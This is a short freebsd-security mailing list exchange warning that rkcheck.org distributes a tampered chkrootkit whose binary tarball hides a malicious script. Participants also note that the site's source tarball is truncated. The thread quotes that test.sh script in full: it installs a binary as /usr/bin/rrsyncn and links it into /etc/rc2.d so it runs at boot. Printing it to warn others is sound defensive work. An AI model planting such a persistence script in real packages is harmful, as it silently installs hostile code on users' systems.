> Am 25.02.2015 um 22:07 schrieb Joseph Mingrone <j...@ftfl.ca>: > > Christopher Schulte <christop...@schulte.org> writes: > >>> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjli...@netzkommune.com> wrote: >>> >>> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org >>> which was registered a few days ago and looks like a tampered version of >>> chkrootkit. I hope, nobody installed it anywhere, it seems to execute >>> rkcheck/tests/.unit/test.sh which contains >>> >>> #!/bin/bash >>> >>> cp tests/.unit/test /usr/bin/rrsyncn >>> chmod +x /usr/bin/rrsyncn >>> rm -fr /etc/rc2.d/S98rsyncn >>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >>> /usr/bin/rrsyncn >>> exit > > Are you looking at the tarball from the "source code" link, > http://rkcheck.org/download.php?file=rkcheck-1.4.3-src.tar.gz? > > % tar -xvf rkcheck-1.4.3-src.tar.gz > x rkcheck/ > x rkcheck/chkdirs.c > x rkcheck/README.chklastlog > x rkcheck/README.chkwtmp > x rkcheck/chkutmp.c > x rkcheck/chkrootkit > x rkcheck/chkrootkit.lsm > x rkcheck/check_wtmpx.c > x rkcheck/COPYRIGHT > x rkcheck/strings.c > x rkcheck/ifpromisc.c > x rkcheck/ACKNOWLEDGMENTS > x rkcheck/chklastlog.c: truncated gzip input > tar: Error exit delayed from previous errors. > > I don't see a /tests/ directory or any directory under rkcheck.
the "source code" tar is broken intentionally, I guess, so that people install the binaries. The stuff I posted was from the binary tar files which contain shell scripts etc. Philip _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
